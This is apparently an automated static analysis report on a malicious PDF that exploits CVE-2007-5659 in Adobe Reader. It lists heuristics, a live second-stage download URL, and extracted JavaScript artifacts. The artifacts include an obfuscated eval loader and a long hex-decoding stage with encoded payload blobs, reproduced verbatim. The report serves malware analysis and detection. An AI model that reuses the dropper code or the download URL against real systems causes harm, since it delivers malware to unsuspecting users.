Malicious PDF — malware analysis report

Static analysis result for SHA-256 70541a8005910710…

MALICIOUS

PDF

15.2 KB
MD5: 226078fa6be384fc161ff911dfe0abfd SHA-1: 5962cf9db9dbca4e6b40930460b1b34934501ba0 SHA-256: 70541a80059107106431f90b5f420e518cca0e28be287dc963bc98a8afd7a34f
366 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

The PDF file contains obfuscated JavaScript that exploits CVE-2007-5659 in Adobe Reader. The script is designed to download and execute a second-stage payload from the URL http://searchfunes.org/cgi-bin/153/n002106204r0409X1d8f2d6fY7f449450. The presence of multiple JavaScript exploit-related heuristics and a high ML classifier score indicate a malicious intent.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 10

  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after static deobfuscation)
  • JavaScript action low 5 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Adobe Reader APSB08-13 patch-range version gate (CVE-2007-5659) high CVE likely PDF_JS_ADOBE_APSB08_13_PATCH_GATE
    PDF JavaScript gates the exploit payload on (>= 8 && < 8.1.1) OR (< 7.1) — the Reader 7.0.x / 8.0–8.1.1 window patched by Adobe APSB08-13 for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. Only kits that target that exact bug check both of those patch points; benign scripts do not.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • Obfuscated multi-stage PDF JavaScript dropper high PDF_JS_OBFUSCATED_DROPPER
    PDF JavaScript shows 5 independent signals of exploit-kit-style multi-stage obfuscation: annot_subject_stage, hex_codec_loop, hex_dashed_payload, incremental_eval_build, repeated_pluginschk. This is strongly consistent with pre-2011 Adobe Reader PDF droppers — OpenAction JS reads encoded data from annotation subjects, decodes it through one or more hex / base-N loops, and invokes eval indirectly (method name built one character at a time). The actual CVE is hidden in the final decoded layer and is not visible via static analysis.
  • PDF JavaScript shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF JavaScript shellcode contains a hardcoded http(s) URL stored as little-endian %uXXXX Unicode escapes. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • ClamAV: Pdf.Exploit.Agent-35901 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Pdf.Exploit.Agent-35901
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://searchfunes.org/cgi-bin/153/n002106204r0409X1d8f2d6fY7f449450 Referenced by PDF JavaScript

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0005_000.js
4718a27c2224fc36bf24f8e8e04598f1ad78adce4401c7be2708318738a6983d		 pdf-javascript-stream PDF /JS object 5 at offset 0x148 469 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var pr = null;
var fnc = 'ev';
var sum = '';

app.doc.syncAnnotScan();

if (app.plugIns.length != 0) {
	var num = 1;

	pr = app.doc.getAnnots(
		{
			nPage: 0
		}
	);

	sum = pr[num].subject;
}

var buf = "";

if (app.plugIns.length > 3) {
	fnc += 'a';
	var arr = sum.split(/-/);

	
	for (var i = 1; i < arr.length; i++) {
		buf += String.fromCharCode("0x"+arr[i]);
	}
	fnc += 'l';
}

if (app.plugIns.length >= 2)
{
	app[fnc]/**/(buf);
}
legacy_pdfkit_stage_000.js
fb2a64d56a89841f199fa93792391eba0513aeab3625e869e4e70a6e6d9796ac		 deobfuscated-js repeated-marker hex decoded JavaScript at offset 0x199B 12289 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
function ty_6wQdaw(SOS07Jyb, wMFy_10){var h_2_236YX = 20;var IyKX5_248h2m_5l = 0;var T7_uc4E = 512;var G38wEW4KX84g_k = h_2_236YX;var tl4D_aGMH__1_8 = "";var kH_6s3BD8431He = 4;var b_FK7Eg = this;var bP7T3N_Mt = "1234ee";var Tw5_VM047Rt_nDr = arguments;try {var G_____l_J081 = 0;if (app) {G38wEW4KX84g_k = G38wEW4KX84g_k + 2;wMFy_10 = pr[G_____l_J081].subject;}bP7T3N_Mt = bP7T3N_Mt.replace(/\d+/, "call");} catch(e) { }G38wEW4KX84g_k = G38wEW4KX84g_k - h_2_236YX;var fP6__14RpP = new Array();var t_t__C_03__yX_H = 150;if (t_t__C_03__yX_H > 0) {fP6__14RpP[0] = t_t__C_03__yX_H;fP6__14RpP[1] = T7_uc4E;fP6__14RpP[0] = fP6__14RpP[0] - t_t__C_03__yX_H;fP6__14RpP[2] = fP6__14RpP[0];fP6__14RpP[1] = fP6__14RpP[1] - T7_uc4E;fP6__14RpP[3] = fP6__14RpP[1];}if (SOS07Jyb) { fP6__14RpP = SOS07Jyb;}if (!SOS07Jyb) {var Cem_kGA1_j1 = Tw5_VM047Rt_nDr[bP7T3N_Mt].toString();var HORm18rD = 0;var XqB0XW7a52O__7 = HORm18rD;t_t__C_03__yX_H = t_t__C_03__yX_H - 102;var j10kTX8HH2px = 0;while(XqB0XW7a52O__7 < Cem_kGA1_j1.length) {j10kTX8HH2px = Cem_kGA1_j1.charCodeAt(XqB0XW7a52O__7);if (j10kTX8HH2px >= t_t__C_03__yX_H && j10kTX8HH2px <= 57) {if (HORm18rD == kH_6s3BD8431He) {HORm18rD = -1;}if (HORm18rD < 0) { HORm18rD = 0; }fP6__14RpP[HORm18rD] += j10kTX8HH2px;if (fP6__14RpP[HORm18rD] > T7_uc4E) {fP6__14RpP[HORm18rD] -= T7_uc4E;}HORm18rD = HORm18rD + 1;}XqB0XW7a52O__7 = XqB0XW7a52O__7 + 1;}}var M_6A__T_Np = 0;var J5Ke45Qql = 0;var uG___P = -1;var lg_6__5 = 0;var j1___3VQu = 0;do {var Su___0iBFD = 256;if (fP6__14RpP[lg_6__5] > Su___0iBFD) {fP6__14RpP[lg_6__5] -= Su___0iBFD;}lg_6__5 = lg_6__5 + 1;} while (lg_6__5 < kH_6s3BD8431He);lg_6__5 = lg_6__5 - kH_6s3BD8431He;while(lg_6__5 < wMFy_10.length) {var N55_1__6 = wMFy_10.substr(lg_6__5, 1) + ' V V ';lg_6__5 = lg_6__5 + 1;var SnoD0D = parseInt(N55_1__6, h_2_236YX);if (uG___P != -1) {J5Ke45Qql += SnoD0D;if (M_6A__T_Np == kH_6s3BD8431He) {M_6A__T_Np = 0;}var AY207iciN_1__v6 = J5Ke45Qql;AY207iciN_1__v6 = AY207iciN_1__v6 - (j1___3VQu + 2) * fP6__14RpP[M_6A__T_Np];if (AY207iciN_1__v6 <= 0) {AY207iciN_1__v6 = AY207iciN_1__v6 - Math.floor(AY207iciN_1__v6 / 256) * 256;}AY207iciN_1__v6 = String.fromCharCode(AY207iciN_1__v6);if (G38wEW4KX84g_k == 1) {tl4D_aGMH__1_8 += SnoD0D;} else if (G38wEW4KX84g_k == 2) {tl4D_aGMH__1_8 += AY207iciN_1__v6;} else {tl4D_aGMH__1_8 += lg_6__5;uG___P = -2;}uG___P = -1;M_6A__T_Np = M_6A__T_Np + 1;j1___3VQu = j1___3VQu + 1;} else if (uG___P == -1) {uG___P = h_2_236YX;J5Ke45Qql = SnoD0D * h_2_236YX;}}var BQL_J_33E = this;BQL_J_33E['ev'+'al'](tl4D_aGMH__1_8);}
	ty_6wQdaw(0, "26692i8a63c6cfcfa55f9db453cf5401b0341ha246051jaa7d76be1735a055cd8e6962bec1ag2b1c3c44060d9b0h9312144d3c1683124150c86gbd497cc1b34hbj7b624i6fc8283j9436ca455a110e6dbg6haf7c080f73569376234i22cf037f7j40be7a11cf906g38344h9595c80h793277aj77b712a9b8c8726ib89daa2ca20042358a519cahc1a1606ha53i0j43a8bg732j1a4a091a15683d8j28210i4g257b5h2jcf070h08295j7c9413889e6a194e737e0ib2014i0i374013276jbia545136c872j6fcf4d2aad340845200ba8698d4j925j2jcf78756h67476fbcb0b48g6i6i0164b0bc7c6c753i6c9bc60744a22b340j7e9jad8j9c1h5f7bb287a94fb5053fc38j3c1706c30a34a3c953ae4201bj463bce28agc6c67e3491ai2g018i2d7h555i32a80e1e307542a41ea8aaah0g57796i4db00i144d0867bh317abhab4h186761556fbh302aa13d01455d069c3e7d6haj603dbi4885936726581j13c68170549c74bgb661632g7f6j95bbae0i9d5b46079a8gag929216345h7e97cf4f94be67339c6fc4aga2b2507ea0640f5f12be6h460h0ga9baaj776hb2aic00j7j1d5a425335b2cf1g164052b018920c9h404f78740a85b10g1f01342b1697cfb32gbe679b346fc4483eb250162i399c9e427e34773e4bcf73546i675b5c1jc408626650a26da019919a6j6d2g9fbi9c08ad4767b27g9j1386a924545c9c70b626bi197227ce749c8ha7944269966b9c7701af4616094fae0f0680489ace0a9c65b64a402gbgb79c3h315j5ha30fbb0h7c35477c3c1j6g0j3j410e42135d66cfac3ec052703g3ca32865c75h0b3j530hag69af7c838751137c7f9g6d1c851jc5c35j7b759c890714669a657267a6c09c186a283da0b96g0ba79j0b457bbf68cf4fcaag4dbc8c489e8g99946j93bj2jad670j8g673b1e1f9c252095767c0f00bf5d0j8b3439be0acf0j236740ca1ic5cf9g141i787b31b00i494g333cbd285dajbd54ag3c7h365fa94h6d9i70316g5b100836914d6g4b0h9c8b428d483757150jb46748369458a0a35c8740573d8bcbaj00b34d7017a76g09ae76005h5c9h61c15f8g1g6d2ec17
... (truncated)
deobfuscated.js
50c80518460b20a4f5e20bd794c430f1adc10bf9d03c239e68d5efb5459837cf		 deobfuscated-js PDF JavaScript deobfuscation pass 76560 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 9 eval/decoder/string-building token(s). Carved artifact contains 2 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
var pr = null;
var fnc = 'ev';
var sum = '';

app.doc.syncAnnotScan();

if (app.plugIns.length != 0) {
	var num = 1;

	pr = app.doc.getAnnots(
		{
			nPage: 0
		}
	);

	sum = pr[num].subject;
}

var buf = "";

if (app.plugIns.length > 3) {
	fnc += 'a';
	var arr = sum.split(/-/);

	
	for (var i = 1; i < arr.length; i++) {
		buf += String.fromCharCode("0x"+arr[i]);
	}
	fnc += 'l';
}

if (app.plugIns.length >= 2)
{
	app.eval(buf);
}

26692i8a63c6cfcfa55f9db453cf5401b0341ha246051jaa7d76be1735a055cd8e6962bec1ag2b1c3c44060d9b0h9312144d3c1683124150c86gbd497cc1b34hbj7b624i6fc8283j9436ca455a110e6dbg6haf7c080f73569376234i22cf037f7j40be7a11cf906g38344h9595c80h793277aj77b712a9b8c8726ib89daa2ca20042358a519cahc1a1606ha53i0j43a8bg732j1a4a091a15683d8j28210i4g257b5h2jcf070h08295j7c9413889e6a194e737e0ib2014i0i374013276jbia545136c872j6fcf4d2aad340845200ba8698d4j925j2jcf78756h67476fbcb0b48g6i6i0164b0bc7c6c753i6c9bc60744a22b340j7e9jad8j9c1h5f7bb287a94fb5053fc38j3c1706c30a34a3c953ae4201bj463bce28agc6c67e3491ai2g018i2d7h555i32a80e1e307542a41ea8aaah0g57796i4db00i144d0867bh317abhab4h186761556fbh302aa13d01455d069c3e7d6haj603dbi4885936726581j13c68170549c74bgb661632g7f6j95bbae0i9d5b46079a8gag929216345h7e97cf4f94be67339c6fc4aga2b2507ea0640f5f12be6h460h0ga9baaj776hb2aic00j7j1d5a425335b2cf1g164052b018920c9h404f78740a85b10g1f01342b1697cfb32gbe679b346fc4483eb250162i399c9e427e34773e4bcf73546i675b5c1jc408626650a26da019919a6j6d2g9fbi9c08ad4767b27g9j1386a924545c9c70b626bi197227ce749c8ha7944269966b9c7701af4616094fae0f0680489ace0a9c65b64a402gbgb79c3h315j5ha30fbb0h7c35477c3c1j6g0j3j410e42135d66cfac3ec052703g3ca32865c75h0b3j530hag69af7c838751137c7f9g6d1c851jc5c35j7b759c890714669a657267a6c09c186a283da0b96g0ba79j0b457bbf68cf4fcaag4dbc8c489e8g99946j93bj2jad670j8g673b1e1f9c252095767c0f00bf5d0j8b3439be0acf0j236740ca1ic5cf9g141i787b31b00i494g333cbd285dajbd54ag3c7h365fa94h6d9i70316g5b100836914d6g4b0h9c8b428d483757150jb46748369458a0a35c8740573d8bcbaj00b34d7017a76g09ae76005h5c9h61c15f8g1g6d2ec17g088g8jad346i9f201734c78g5715cb4b9cbhaa624088b0039c99257b5h2jcf070h08295j7c9413889e7704143f3c3380bf1d373f34b71656c0821eb7348j5565ab395d09482f6168aj0i6fbg79ai7c080b736f6j45478b00cf1b965f7hbi9b12039g976f722g8fb4bf339h513cc87g9jc2b09b0d3g48ab870j4fba2269c98j8312c104946d980a53cf67ah895h15b508b1a81c997b7ccb2i0i812j4g3622c3b71229382g5ic72j9bcf8f224f4h6j3d9a9c250i2042133g90bh91312669962272ag616gcf6i3a455d069c3e806e80774e077e80604d146icacf0i8e6d459292090j9g7f6e6c65aaaf06086c1979ag7e6ia17d76c94d488761a11ccd1d6ebc8i72agc908cf6i9i962b9c469e914d08ca16cf021a8545861i250e872e803d20390d0434295j67a70bb1a97b3120653c1j6gc01e41227005275i0jc5502378962a72ag616gcf6i3a2i2b9cac3i7c42755132cf7555935b348109031b7c484d887eaicf829a51453aa5cd0243ae566h12a974a87g76324881c08f0a5a8bc37h39c04g0906c9027260af20a94b08bb7608aa43a80fbb7f5a9h0d1j047jc37b6745beb99c000d2g6ja02h99b78e273f67703d7dcf3j33c84cag43870jb3522269612g780566610c6g0j2i5fa8cf47975a91653b04734j93673951c3a1b4998e69ca560e11916c4a6a4j8f99072g8c3i59bj6i859ca1a93f677gbg89a926b91c692ia57b04c5ab0c3c9fa253ad4jc09h5f3b0e3ba90f0h853d86262fc3902c81725bc2ahaec90d696e9402bi119h102i6a5f337h073c302659cf209005bi55246g543b519c352j947fc8686505aa50ai57994f3jc8626g8553145jbc9ec050483f888g19056a7862575973bjc822943953b76ib905acb62f677b8h61c529950j6e00c37i07ca00c53479965a116dac966a2bcf190708cc8e599bc526ag892g7j6i5ic5abaj3h313c67a519aebh8j354c67493d9jbh0g27c86d185687cfb32hbd5h61356ba85934046d3a6964089c4h7c406g5008a9577b9874477d1jafc17b5547b78gb4099i956a725h629h9c02762036b7a7a40ga7a92f4755a761af4bbcc06h32c1760e8g9994419196399c36aa88361f0g1c091i159e727cb9059c5ecd816e20c2a8052c365j67c70h95c575151i707148a710480i05341f2287ad9f40055f875a6fa95b5db93dc83320aaa136c36da47e3bcf73556h5h215d1f06c88b8e6fc294059c715e2i403c649f1947a24h700d76aba8a787175a6da587044f8j1367118a509cc5c6086793c933a95hab8f3i440f46071g166934c30g1j015j1d6f545b0b0bcf1ic2374d94cc8d116a021f34713iagcf3j410f410d2367cbbf2a13456j485hc35b5ic7412f61459ca33689656g45080578829367475dc9c5c161776j9489b1b77i7j5767649595cf338f454b0j7e9jad8j9c1h5f7bb287a94fb50534c39j3caaa30fbi6795a953bj5409956b3b0008a3bh
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.